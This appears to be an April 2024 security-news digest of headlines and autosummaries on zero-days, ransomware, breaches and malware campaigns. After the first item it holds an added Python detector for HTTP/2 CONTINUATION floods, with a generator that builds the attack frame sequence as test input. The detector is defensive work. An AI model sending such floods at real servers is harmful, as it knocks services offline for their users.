          New research has found that the CONTINUATION frame in the HTTP/2 protocol can be exploited to conduct denial-of-service (DoS) attacks. The technique has been codenamed HTTP/2 CONTINUATION Flood by security researcher Bartek Nowotarski, who reported the issue to the CERT Coordination Center (CERT/CC) on January 25, 2024. "Many HTTP/2 implementations do not properly limit or sanitize the "

          Autosummary: " The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang (CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js (CVE-2024-27983), and Tempesta FW (CVE-2024-2758). "
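The two CONTINUATION Flood items (the Security Affairs piece above and this one) describe the same mechanism: a HEADERS frame with END_HEADERS clear, followed by CONTINUATION frames that never set it, which a vulnerable implementation keeps receiving, buffering or decoding without bound. The following is an added example, not code from nghttp2, Apache httpd, Go or CERT/CC: a minimal frame walker that enforces a byte budget and a frame budget on an unfinished header block and rejects as soon as either is exceeded. The 16 KiB and 16-frame limits are assumed values for the demo, and the frame payloads are opaque filler rather than real HPACK.

```python
# HTTP/2 frame constants (RFC 9113).
FRAME_HEADERS = 0x1
FRAME_CONTINUATION = 0x9
FLAG_END_HEADERS = 0x4            # set on the frame that finishes a header block

MAX_HEADER_BLOCK_BYTES = 16 * 1024   # assumed budget for one header block
MAX_CONTINUATION_FRAMES = 16         # assumed budget for frames per block


def frame(ftype, flags, stream_id, payload):
    """Serialize one frame: 24-bit length, type, flags, reserved bit + 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + (stream_id & 0x7FFFFFFF).to_bytes(4, "big") + payload)


def parse_frames(data):
    """Yield (type, flags, stream_id, payload) for each complete frame in data."""
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = int.from_bytes(data[off + 5:off + 9], "big") & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) < length:
            break                      # truncated trailing frame, stop here
        yield ftype, flags, stream_id, payload
        off += 9 + length


def check_header_blocks(data, max_bytes=MAX_HEADER_BLOCK_BYTES,
                        max_frames=MAX_CONTINUATION_FRAMES):
    """Walk a frame stream and return (ok, reason).

    A vulnerable implementation keeps accepting CONTINUATION frames until
    END_HEADERS arrives. Here the open header block is charged against a byte
    budget and a frame budget, and the stream is rejected on the first overrun.
    """
    open_stream = None       # stream id of the header block being assembled
    block_bytes = 0
    cont_frames = 0
    for ftype, flags, sid, payload in parse_frames(data):
        if ftype == FRAME_HEADERS:
            if open_stream is not None:
                return False, "HEADERS while another header block is open"
            open_stream, block_bytes, cont_frames = sid, len(payload), 0
        elif ftype == FRAME_CONTINUATION:
            if sid != open_stream:
                return False, "CONTINUATION without a matching open HEADERS"
            cont_frames += 1
            block_bytes += len(payload)
        elif open_stream is not None:
            return False, "non-CONTINUATION frame inside a header block"
        else:
            continue               # ordinary frame, nothing to account for
        if block_bytes > max_bytes:
            return False, f"header block exceeds {max_bytes} bytes"
        if cont_frames > max_frames:
            return False, f"more than {max_frames} CONTINUATION frames"
        if flags & FLAG_END_HEADERS:
            open_stream = None     # block complete, budget resets
    if open_stream is not None:
        return False, "header block not terminated within input"
    return True, "ok"


# Constructed inputs; payload bytes are filler, not decodable HPACK.
def benign_stream():
    """HEADERS split into one CONTINUATION that carries END_HEADERS."""
    return (frame(FRAME_HEADERS, 0, 1, b"\x82\x86\x84")
            + frame(FRAME_CONTINUATION, FLAG_END_HEADERS, 1, b"\x41" * 40))


def flood_stream(frames=1000, size=1024):
    """HEADERS with END_HEADERS clear, then CONTINUATION frames that never set it."""
    head = frame(FRAME_HEADERS, 0, 1, b"\x82")
    return head + b"".join(frame(FRAME_CONTINUATION, 0, 1, b"\x00" * size)
                           for _ in range(frames))


if __name__ == "__main__":
    print(check_header_blocks(benign_stream()))
    print(check_header_blocks(flood_stream()))         # byte budget trips first
    print(check_header_blocks(flood_stream(size=1)))   # frame budget trips first
```

Both budgets matter: large frames exhaust the byte limit after a handful of frames, while many tiny frames stay under it and are caught only by the frame count. A real server applies the same accounting before handing the block to the HPACK decoder, which is where the CPU cost the Go advisory describes is incurred.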


          The Biggest Takeaways from Recent Malware Attacks

          exploits
          2024-04-04 https://www.bleepingcomputer.com/news/security/the-biggest-takeaways-from-recent-malware-attacks/
          Recent high-profile malware attacks teach us lessons on limiting malware risks at organizations. Learn more from Blink Ops about what these attacks taught us. [...] "

          Autosummary: Anti-virus and anti-malware software: Anti-virus and anti-malware solutions are cornerstone elements in malware risk reduction. Anti-malware tools combat a wider range of malicious software, including newer and more sophisticated threats like ransomware, spyware, and zero-day attacks (threats that exploit previously unknown vulnerabilities). User privilege management addresses this through things like role-based access controls, regular privilege audits and reviews, multi-factor authentication (MFA), and automated de-provisioning of access to resources when people leave or change roles. "


          Google patches Pixel phone zero-days after exploitation by “forensic companies”

          exploits
          2024-04-04 https://www.tripwire.com/state-of-security/google-patches-pixel-phone-zero-days-after-exploitation-forensic-companies
          Google has issued a security advisory to owners of its Android Pixel smartphones, warning that it has discovered someone has been targeting some devices to bypass their built-in security. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: What makes the reported attacks particularly interesting is that traditional cybercriminals may not be behind them, but rather "forensic companies" exploiting two vulnerabilities to extract information and prevent remote wiping. "


          Omni Hotels suffer prolonged IT outage due to cyberattack

          ciber
          2024-04-04 https://www.helpnetsecurity.com/2024/04/04/omni-hotels-suffer-prolonged-it-outage-due-to-cyberattack/

          Texas-based Omni Hotels & Resorts has been responding to a cyberattack that started last Friday, which resulted in the unavailability of many of its IT systems. According to people staying at some of the 50 properties the company operates across North America, who took to Reddit to vent and discuss the problem, the outage affected reservation and check-in systems, room key cards, and payment systems. What is known about the Omni Hotels cyberattack? The disruption … More

          The post Omni Hotels suffer prolonged IT outage due to cyberattack appeared first on Help Net Security.

          "

          Autosummary: The cyber attack disrupted hotel operations: “It’s unlikely many hotel guests would have ever considered how connected and digitally-dependent their holiday destination was, but this is now a situation they are unlikely to forget,” William Wright, CEO of Closed Door Security, commented for Help Net Security. "


          NIST awards $3.6 million to address the cybersecurity workforce gap

          ciber
          2024-04-04 https://www.helpnetsecurity.com/2024/04/04/nist-cooperative-agreements-3-6-million/

          The US Department of Commerce’s National Institute of Standards and Technology (NIST) has awarded cooperative agreements totaling nearly $3.6 million aimed at building the workforce needed to safeguard enterprises from cybersecurity risks. The grants of roughly $200,000 each will go to 18 education and community organizations in 15 states that are working to address the nation’s shortage of skilled cybersecurity employees. The cooperative agreements will be overseen by NICE, a NIST-led partnership between government, academia … More

          The post NIST awards $3.6 million to address the cybersecurity workforce gap appeared first on Help Net Security.

          "

          Autosummary: The award recipients, areas served, and amounts awarded are:
          - Benedict College (South Carolina and the surrounding Southeastern region): $200,000
          - Board of Regents, Nevada System of Higher Education on behalf of University of Nevada, Las Vegas (Las Vegas-Henderson-Paradise region): $199,635
          - Bowling Green State University (Ohio): $199,376
          - CyberUp (Greater St. Louis area): $200,000
          - Cyber Bytes Foundation (Stafford County, Virginia): $189,042.35
          - Digital Promise Global (East Alabama): $198,852
          - Energy Sector Security Consortium Inc. (Oregon and Southwest Washington): $200,000
          - George Mason University (District of Columbia; Alexandria, Virginia; and Fairfax, Virginia): $199,901
          - Greater Phoenix Chamber Foundation (Phoenix/Tucson): $200,000
          - Kaua‘i Economic Development Board (Hawai‘i): $200,000
          - NPower Inc. (New Jersey/New York): $200,000
          - RTriad Enterprises Inc. (North Carolina): $200,000
          - San Diego Workforce Partnership (San Diego County): $199,820
          - Strategic Ohio Council for Higher Education (SOCHE) (Cincinnati-Dayton region): $200,000
          - Texas Tech University (West Texas region): $199,349
          - The University of South Florida Board of Trustees (Florida): $200,000
          - WeReach (Gateway Cities of Massachusetts): $199,998.70
          - Women’s Society of Cyberjutsu (Las Vegas and the greater Nevada area): $200,000
          "


          Vietnam-Based Hackers Steal Financial Data Across Asia with Malware

          financial exploits
          2024-04-04 https://thehackernews.com/2024/04/vietnam-based-hackers-steal-financial.html
          A suspected Vietnamese-origin threat actor has been observed targeting victims in several Asian and Southeast Asian countries with malware designed to harvest valuable data since at least May 2023. Cisco Talos is tracking the cluster under the name CoralRaider, describing it as financially motivated. Targets of the campaign include India, China, South Korea, Bangladesh, Pakistan, Indonesia,

          Autosummary: "The malvertising campaigns have tremendous reach through Meta’s sponsored ad system and have actively been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere," the Romanian cybersecurity company said.


          New Phishing Campaign Targets Oil & Gas with Evolved Data-Stealing Malware

          financial exploits industry
          2024-04-04 https://thehackernews.com/2024/04/new-phishing-campaign-targets-oil-gas.html
          An updated version of an information-stealing malware called Rhadamanthys is being used in phishing campaigns targeting the oil and gas sector. "The phishing emails use a unique vehicle incident lure and, in later stages of the infection chain, spoof the Federal Bureau of Transportation in a PDF that mentions a significant fine for the incident," Cofense researcher Dylan Duncan said. The

          Autosummary: "The main actor [Bignosa] appears to be a part of a group operating malware and phishing campaigns, targeting organizations, which is testified by the US and Australian email business databases, as well as individuals," the Israeli cybersecurity company said.


          US cancer center City of Hope: data breach impacted 827149 individuals

          financial government
          2024-04-04 https://securityaffairs.com/161481/data-breach/city-of-hope-data-breach.html
          US cancer center City of Hope suffered a data breach that impacted 800,000 individuals; personal and health information was compromised. City of Hope is a renowned cancer research and treatment center located in Duarte, California, United States. It is recognized for its comprehensive cancer care, innovative research, and compassionate patient support services. City of Hope […]

          Autosummary: “While the investigation remains ongoing, the impacted personal information identified thus far varies by individual but may have included name, contact information (e.g., email address, phone number), date of birth, social security number, driver’s license or other government identification, financial details (e.g., bank account number and/or credit card details), health insurance information, medical records and information about medical history and/or associated conditions, and/or unique identifiers to associate individuals with City of Hope (e.g., medical record number),” reads the notice of incident published by the cancer research center on its website.


          Microsoft fixes Outlook security alerts bug caused by December updates

          exploits
          2024-04-04 https://www.bleepingcomputer.com/news/security/microsoft-fixes-outlook-security-alerts-bug-caused-by-december-updates/
          Microsoft has fixed an issue that triggers erroneous Outlook security alerts when opening .ICS calendar files after installing the December 2023 Outlook Desktop security updates [...]

          Autosummary: To apply the workaround, you have to add a new DWORD key with a value of "1" to:
          HKEY_CURRENT_USER\software\policies\microsoft\office\16.0\common\security (Group Policy registry path)
          Computer\HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security (OCT registry path)
          Affected Outlook users can also disable the warning dialogs by following the instructions in the "Enable or disable hyperlink warning messages in Office programs" support document.


          Hoya’s optics production and orders disrupted by cyberattack

          industry ciber
          2024-04-04 https://www.bleepingcomputer.com/news/security/hoyas-optics-production-and-orders-disrupted-by-cyberattack/
          Hoya Corporation, one of the largest global manufacturers of optical products, says a "system failure" caused servers at some of its production plants and business divisions to go offline on Saturday. [...]



          US cancer center data breach exposes info of 827,000 patients

          financial
          2024-04-04 https://www.bleepingcomputer.com/news/security/us-cancer-center-data-breach-exposes-info-of-827-000-patients/
          Cancer treatment and research center City of Hope is warning that a data breach exposed the sensitive information of over 820,000 patients. [...]



          Jackson County hit by ransomware, declares state of emergency

          exploits government ransomware
          2024-04-04 https://www.malwarebytes.com/blog/news/2024/04/jackson-county-hit-by-ransomware-declares-state-of-emergency
          Jackson County has suffered "significant disruptions within its IT systems," and its offices are closed.

          Autosummary: “Offices will be closed until further notice.” (Jackson County MO, @JacksonCountyMO, April 2, 2024) The tweet explains that the attack has affected systems dealing with “tax payments and online property, marriage license and inmate searches,” and says that “the Assessment, Collection and Recorder of Deeds offices at all County locations will be closed until further notice.” Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


          New Latrodectus malware replaces IcedID in network breaches

          exploits
          2024-04-04 https://www.bleepingcomputer.com/news/security/new-latrodectus-malware-replaces-icedid-in-network-breaches/
          A relatively new malware called Latrodectus is believed to be an evolution of the IcedID loader, seen in malicious email campaigns since November 2023. [...]

          Autosummary: The commands Latrodectus supports are the following:
          Get the filenames of files on the desktop
          Get the list of running processes
          Send additional system information
          Execute an executable file
          Execute a DLL with a given export
          Pass a string to cmd and execute it
          Update the bot and trigger a restart
          Shutdown the running process
          Download "bp.dat" and execute it
          Set a flag to reset the timing of the communications
          Reset the counter variable used in communications
          The malware’s infrastructure is separated into two distinct tiers that follow a dynamic operation approach regarding campaign involvement and lifespan, with most new C2 coming online towards the end of the week before the attacks.


          Visa warns of new JSOutProx malware variant targeting financial orgs

          financial exploits
          2024-04-04 https://www.bleepingcomputer.com/news/security/visa-warns-of-new-jsoutprox-malware-variant-targeting-financial-orgs/
          Visa is warning about a spike in detections for a new version of the JsOutProx malware targeting financial institutions and their customers. [...]

          Autosummary: First encountered in December 2019, JsOutProx is a remote access trojan (RAT) and highly obfuscated JavaScript backdoor that allows its operators to run shell commands, download additional payloads, execute files, capture screenshots, establish persistence on the infected device, and control the keyboard and mouse.


          Cyber attacks on critical infrastructure show advanced tactics and new capabilities

          industry
          2024-04-03 https://www.helpnetsecurity.com/2024/04/03/marty-edwards-tenable-critical-infrastructure-systems-cybersecurity/

          In this Help Net Security interview, Marty Edwards, Deputy CTO OT/IoT at Tenable, discusses the impact of geopolitical tensions on cyber attacks targeting critical infrastructure. Edwards highlights the need for collaborative efforts between policymakers, government agencies, and the private sector to strengthen cybersecurity across critical infrastructure sectors. He emphasizes investment in personnel, technology, and proactive measures. How have recent political unrest and geopolitical tensions influenced the frequency and nature of cyber attacks on critical infrastructure? … More

          The post Cyber attacks on critical infrastructure show advanced tactics and new capabilities appeared first on Help Net Security.


          Autosummary: Inadequate cyber hygiene practices, such as default passwords and lack of authentication security, pose significant risks to critical infrastructure, particularly in sectors like water facilities.


          Cybersecurity jobs available right now: April 3, 2024

          ciber
          2024-04-03 https://www.helpnetsecurity.com/2024/04/03/cybersecurity-jobs-available-right-now-april-3-2024/

          Cyber Security Manager, Charterhouse Middle East | UAE | On-site
          The Cyber Security Manager will identify and address potential security issues, define access privileges, implement control structures, and conduct periodic audits. In addition, you’ll also contribute to ongoing security improvements, stay abreast of industry trends, and collaborate with the team to ensure the highest level of information system security.
          Cyber Security Architect, Eutelsat Group | Italy | Hybrid … More

          The post Cybersecurity jobs available right now: April 3, 2024 appeared first on Help Net Security.


          Autosummary:
          Junior Security Consultant – Security Risk Management, WSP in the Middle East | UAE | Hybrid
          WSP are seeking a junior security consultant who holds a bachelor’s degree in a security-related field (such as public safety, international and civil security, homeland security, anti-terrorism, security and risk management) or Architecture or Landscaping or Engineering or Design or Master Planning to join their security risk management business.
          Security Engineer Jr, Accenture | Mexico | On-site
          Apply security skills to design, build and protect enterprise systems, applications, data, assets, and people.


          Attack Surface Management vs. Vulnerability Management

          exploits
          2024-04-03 https://thehackernews.com/2024/04/attack-surface-management-vs.html
          Attack surface management (ASM) and vulnerability management (VM) are often confused, and while they overlap, they’re not the same. The main difference between attack surface management and vulnerability management is in their scope: vulnerability management checks a list of known assets, while attack surface management assumes you have unknown assets and so begins with discovery. Let’s look at

          Autosummary: A screenshot of the Intruder vulnerability management platform, which is designed to perform thousands of security checks, identifying vulnerabilities in web apps, APIs, cloud systems, and beyond. With ASM, all known or unknown assets (on-premises, cloud, subsidiary, third-party, or partner environments) are detected from the attacker’s perspective from outside the organization.


          Mispadu Trojan Targets Europe, Thousands of Credentials Compromised

          exploits
          2024-04-03 https://thehackernews.com/2024/04/mispadu-trojan-targets-europe-thousands.html
          The banking trojan known as Mispadu has expanded its focus beyond Latin America (LATAM) and Spanish-speaking individuals to target users in Italy, Poland, and Sweden. Targets of the ongoing campaign include entities spanning finance, services, motor vehicle manufacturing, law firms, and commercial facilities, according to Morphisec. "Despite the geographic expansion, Mexico remains the

          Autosummary: "Before downloading and invoking the next stage, the script conducts several Anti-VM checks, including querying the computer’s model, manufacturer, and BIOS version, and comparing them to those associated with virtual machines."


          Google fixes two Pixel zero-day flaws exploited by forensics firms

          exploits industry
          2024-04-03 https://www.bleepingcomputer.com/news/security/google-fixes-two-pixel-zero-day-flaws-exploited-by-forensics-firms/
          Google has fixed two Google Pixel zero-days exploited by forensic firms to unlock phones without a PIN and gain access to the data stored within them. [...]

          Autosummary: "CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking," explained GrapheneOS via a thread on X. "Forensic companies are rebooting devices in ‘After First Unlock’ state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory."


          A “cascade” of errors let Chinese hackers into US government inboxes

          government
          2024-04-03 https://www.helpnetsecurity.com/2024/04/03/microsoft-storm-0558-key/

          Microsoft still doesn’t know how Storm-0558 attackers managed to steal the Microsoft Services Account cryptographic key they used to forge authentication tokens needed to access email accounts belonging to US government officials. “The stolen 2016 MSA key in combination with [a] flaw in the token validation system permitted the threat actor to gain full access to essentially any Exchange Online account,” CISA’s Cyber Safety Review Board (CSRB) noted in a recently released Review of the … More

          The post A “cascade” of errors let Chinese hackers into US government inboxes appeared first on Help Net Security.


          Autosummary: “A preventable intrusion” Though they praised Microsoft for fully cooperating in the review, the CSRB excoriated Microsoft by saying that the intrusion was the result of a “cascade” of avoidable errors, including:
          The company’s failure to detect the compromise of its cryptographic keys
          The lack of adequate cloud security controls
          Their failure to detect a compromise of an employee’s laptop from a recently acquired company before allowing it to connect to the company’s corporate network
          “The Board finds that this intrusion was preventable and should never have occurred.”


          Google fixed two actively exploited Pixel vulnerabilities

          exploits
          2024-04-03 https://securityaffairs.com/161428/security/google-fixed-actively-exploited-pixel-flaws.html
          Google addressed several vulnerabilities in Android and Pixel devices, including two actively exploited flaws. Google addressed 28 vulnerabilities in Android and 25 flaws in Pixel devices. Two issues fixed by the IT giant, tracked as CVE-2024-29745 and CVE-2024-29748, are actively exploited in the wild. The most critical flaw addressed by the company impacts the System […]



          US State Department investigates alleged theft of government data

          government
          2024-04-03 https://www.bleepingcomputer.com/news/security/us-state-department-investigates-alleged-theft-of-government-data/
          The U.S. Department of State is investigating claims of a cyber incident after a threat actor leaked documents allegedly stolen from a government contractor. [...]

          Autosummary: According to their claims, the leaked data includes the full names, emails, office numbers, and personal cell numbers of government, military, and Pentagon employees, as well as their email addresses.


          Ivanti fixes VPN gateway vulnerability allowing RCE, DoS attacks

          exploits
          2024-04-03 https://www.bleepingcomputer.com/news/security/ivanti-fixes-vpn-gateway-vulnerability-allowing-rce-dos-attacks/
          IT security software company Ivanti has released patches to fix multiple security vulnerabilities impacting its Connect Secure and Policy Secure gateways. [...]

          Autosummary: These security vulnerabilities (i.e., CVE-2023-46805, CVE-2024-21887, CVE-2024-22024, and CVE-2024-21893) were used as zero-days before other attackers exploited them in widespread attacks to spread custom malware.


          Google fixes one more Chrome zero-day exploited at Pwn2Own

          exploits
          2024-04-03 https://www.bleepingcomputer.com/news/security/google-fixes-one-more-chrome-zero-day-exploited-at-pwn2own/
          Google has fixed another zero-day vulnerability in the Chrome browser, which was exploited by security researchers during the Pwn2Own hacking contest last month. [...]



          AT&T faces lawsuits over data breach affecting 73 million customers

          financial
          2024-04-03 https://www.bleepingcomputer.com/news/security/atandt-faces-lawsuits-over-data-breach-affecting-73-million-customers/
          AT&T is facing multiple class-action lawsuits following the company’s admission to a massive data breach that exposed the sensitive data of 73 million current and former customers. [...]

          Autosummary: It seeks compensatory damages, restitution, injunctive relief, improvements to AT&T’s data security protocols, future audits, credit monitoring services funded by the company, and a trial by jury.


          Google Warns: Android Zero-Day Flaws in Pixel Phones Exploited by Forensic Companies

          exploits
          2024-04-03 https://thehackernews.com/2024/04/google-warns-android-zero-day-flaws-in.html
          Google has disclosed that two Android security flaws impacting its Pixel smartphones have been exploited in the wild by forensic companies. The high-severity zero-day vulnerabilities are as follows:
          CVE-2024-29745 - An information disclosure flaw in the bootloader component
          CVE-2024-29748 - A privilege escalation flaw in the firmware component
          "There are indications that the [



          The New Version of JsOutProx is Attacking Financial Institutions in APAC and MENA via Gitlab Abuse

          financial
          2024-04-03 https://securityaffairs.com/161438/malware/new-jsoutprox-attacking-financial-institutions-apac-mena.html
          Resecurity researchers warn that a new version of JsOutProx is targeting financial institutions in APAC and MENA via Gitlab abuse. Resecurity has detected a new version of JSOutProx, which is targeting financial services and organizations in the APAC and MENA regions. JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET. It employs the […]

          Autosummary: Pierluigi Paganini, April 03, 2024.


          SurveyLama data breach exposes info of 4.4 million users

          financial
          2024-04-03 https://www.bleepingcomputer.com/news/security/surveylama-data-breach-exposes-info-of-44-million-users/
          Data breach alerting service Have I Been Pwned (HIBP) warns that SurveyLama suffered a data breach in February 2024, which exposed the sensitive data of 4.4 million users. [...]



          Omni Hotels confirms cyberattack behind ongoing IT outage

          ciber
          2024-04-03 https://www.bleepingcomputer.com/news/security/omni-hotels-confirms-cyberattack-behind-ongoing-it-outage/
          Omni Hotels & Resorts has confirmed a cyberattack caused a nationwide IT outage that is still affecting its locations. [...]

          Autosummary: The PoS malware was used to steal payment card information, including the cardholder’s name, credit/debit card number, security code, and expiration date, between December 23, 2015, and June 14, 2016, depending on the affected location.


          Hosting firm’s VMware ESXi servers hit by new SEXi ransomware

          exploits ransomware
          2024-04-03 https://www.bleepingcomputer.com/news/security/hosting-firms-vmware-esxi-servers-hit-by-new-sexi-ransomware/
          Chilean data center and hosting provider IxMetro Powerhost has suffered a cyberattack at the hands of a new ransomware gang known as SEXi, which encrypted the company’s VMware ESXi servers and backups. [...]

          Autosummary: On Monday, PowerHost’s Chile division, IxMetro, warned customers that it suffered a ransomware attack early Saturday morning that encrypted some of the company’s VMware ESXi servers that are used to host virtual private servers for customers.


          Jackson County in state of emergency after ransomware attack

          exploits government ransomware
          2024-04-03 https://www.bleepingcomputer.com/news/security/jackson-county-in-state-of-emergency-after-ransomware-attack/
          Jackson County, Missouri, is in a state of emergency after a ransomware attack took down some county services on Tuesday. [...]

          Autosummary: "All county staff are to take whatever steps are necessary to protect resident data, county assets, and continue essential services, thereby mitigating the impact of" the ransomware attack, White said [PDF].


          Google patches critical vulnerability for Androids with Qualcomm chips

          exploits
          2024-04-03 https://www.malwarebytes.com/blog/news/2024/04/google-patches-critical-vulnerability-for-androids-with-qualcomm-chips
          Google has issued patches for 28 security vulnerabilities, including a critical patch for Androids with Qualcomm chips.

          Autosummary: For most phones it works like this: under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.


          Smashing Security podcast #366: Money-making bots, and Incognito isn’t private

          financial
          2024-04-03 https://grahamcluley.com/smashing-security-podcast-366/
          Google says it is deleting your Google Chrome Incognito private-browsing data that it should never have collected anyway. Can a zero-risk millionaire-making bot be trusted? And what countries are banned from buying your sensitive data? All this and much, much more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Host Unknown’s Thom Langford.

          Autosummary: Hosts: Graham Cluley – @gcluley, Carole Theriault – @caroletheriault. Guest: Maria Varmazis – @thomlangford. Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks.


          Google addressed another Chrome zero-day exploited at Pwn2Own in March

          exploits
          2024-04-03 https://securityaffairs.com/161445/hacking/google-chrome-zero-day-pwn2own.html
          Google fixed another Chrome zero-day vulnerability exploited during the Pwn2Own hacking competition in March. Google has addressed another zero-day vulnerability in the Chrome browser, tracked as CVE-2024-3159, that was exploited during the Pwn2Own hacking competition in March 2024. The vulnerability CVE-2024-3159 is an out-of-bounds memory access in the V8 JavaScript engine. The flaw was demonstrated […]

          Autosummary: Reported by undoingfish on 2024-03-17. At the end of March, Google addressed several vulnerabilities in the Chrome web browser, including two zero-day vulnerabilities, tracked as CVE-2024-2886 and CVE-2024-2887, which were demonstrated during the Pwn2Own Vancouver 2024 hacking competition.


          73% brace for cybersecurity impact on business in the next year or two

          ciber
          2024-04-02 https://www.helpnetsecurity.com/2024/04/02/cybersecurity-risks-readiness-level/

          Only 3% of organizations across the globe have the ‘mature’ level of readiness needed to be resilient against modern cybersecurity risks, according to Cisco. The 2024 Cisco Cybersecurity Readiness Index highlights that readiness is down significantly from one year ago, when 15% of companies were ranked mature.
          Low cybersecurity risks readiness levels
          Companies today continue to be targeted with a variety of techniques that range from phishing and ransomware to supply chain and social engineering … More

          The post 73% brace for cybersecurity impact on business in the next year or two appeared first on Help Net Security.


          Autosummary: This raises significant concerns as 67% of organizations said they have deployed ten or more point solutions in their security stacks, while 25% said they have 30 or more.
          Talent shortages impact productivity
          85% of companies said their employees access company platforms from unmanaged devices, and 43% of those spend 20% of their time logged onto company networks from unmanaged devices.


          Why AI forensics matters now

          industry
          2024-04-02 https://www.helpnetsecurity.com/2024/04/02/ai-forensics-video/

          In this Help Net Security video, Sylvia Acevedo, who serves on the Boards of Qualcomm and Credo, discusses why companies should invest in forensic capabilities and why forensics will be such an important topic as AI continues to be integrated into infrastructures and workflows. In an era where AI is becoming increasingly integral to business operations, the lack of comprehensive education and training in AI forensics poses a significant threat. This gap leaves organizations vulnerable … More

          The post Why AI forensics matters now appeared first on Help Net Security.



          Massive Phishing Campaign Strikes Latin America: Venom RAT Targeting Multiple Sectors

          financial
          2024-04-02 https://thehackernews.com/2024/04/massive-phishing-campaign-strikes-latin.html
          The threat actor known as TA558 has been attributed to a new massive phishing campaign that targets a wide range of sectors in Latin America with the goal of deploying Venom RAT. The attacks primarily singled out hotel, travel, trading, financial, manufacturing, industrial, and government verticals in Spain, Mexico, United States, Colombia, Portugal, Brazil, Dominican Republic, and



          PandaBuy data breach allegedly impacted over 1.3 million customers

          financial
          2024-04-02 https://securityaffairs.com/161355/data-breach/pandabuy-data-breach.html
          Threat actors claimed the hack of the PandaBuy online shopping platform and leaked data belonging to more than 1.3 million customers. At least two threat actors claimed the hack of the PandaBuy online shopping platform and leaked data of more than 1.3 million customers on a cybercrime forum. The member of the BreachForums ‘Sanggiero’ announced […]

          Autosummary: “Exfiltrated data includes: UserId, First name, Last name, Phone number, Email, Login Ip, Full address, Order information. Breach patrons are relatively excited.” (vx-underground, @vxunderground, April 1, 2024) Stolen data included UserId, First Name, Last Name, Phone Numbers, Emails, Login IP, Orders_Data, Orders_Id, Home_address, Zip, and Country.


          APT and financial attacks on industrial organizations in H2 2023

          financial industry
          2024-04-02 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-h2-2023/
          An overview of reports of APT and financial attacks on industrial enterprises, as well as related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities.

          Autosummary:
          CISA alert on LockBit 3.0 ransomware
          On November 21, 2023, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) released a joint alert that disseminates Indicators of Compromise (IOCs), Tactics, Techniques and Procedures (TTPs), and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
          CISA alert on Star Blizzard
          In a joint advisory published on December 7, the “Five Eyes” security agencies (the Cybersecurity and Infrastructure Security Agency (CISA) in coordination with the United Kingdom’s National Cyber Security Centre (UK-NCSC), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NCSC-NZ), and the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), and Cyber Command Cyber National Mission Force (CNMF)) warned about the evolving phishing techniques employed by Star Blizzard and its targeting of individuals and organizations, including the U.S. government and defense industrial base.
          The group uses both well-known classic credential access tools and custom applications: Bughatch, Burntcigar, Cobeacon, Hancitor (Chanitor), Termite, SystemBC, Veeamp, Wedgecut, RomCOM RAT, Mimikatz, PowerShell, PsExec, and Remote Desktop Protocol.
          Since March, Microsoft researchers have observed phishing attacks by TA422 (aka APT28, Forest Blizzard, Strontium, Fancy Bear, and Fighting Ursa) targeting government, energy, transportation, and non-governmental organizations in the U.S., Europe, and the Middle East.
          TEMP.Hex is targeting a variety of sectors, including construction and engineering, business services, government, health, transportation, and retail organizations in Europe, Asia, and the U.S. Another threat actor tracked as UNC4698 is also using USB drives to spread the SnowyDrive malware, which creates a backdoor on infected systems, providing attackers a way to remotely interact with the device and issue commands.
          This group, which typically targets logistics, government, and financial sectors in India and Israel (and, to a lesser extent, in Australia, Senegal, the Netherlands, Sweden, and Ethiopia), has been linked to more than 750 DDoS attacks and 78 website defacements since June 2022.
          CISA alert on Rhysida ransomware
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint alert that provides defenders with Rhysida Ransomware indicators of compromise (IOCs), detection information, and tactics, techniques, and procedures (TTPs) discovered during investigations as of September 2023.
          The group used a new backdoor named Sponsor to target organizations in Brazil, Israel, and the UAE: the targeted entities include automotive, manufacturing, engineering, financial services, media, healthcare, technology, and telecoms sectors.
          In a joint advisory published on December 13, the FBI, the Cybersecurity & Infrastructure Security Agency (CISA), the NSA, the Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK National Cyber Security Centre (NCSC) warned that APT29 has been exploiting an authentication bypass vulnerability (CVE-2023-42793) in TeamCity.
          Cuba targeted organizations in the U.S., Canada, Australia, and Europe with a series of high-profile attacks on oil companies, manufacturing, financial services, government agencies, healthcare providers, and others.
          LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation.
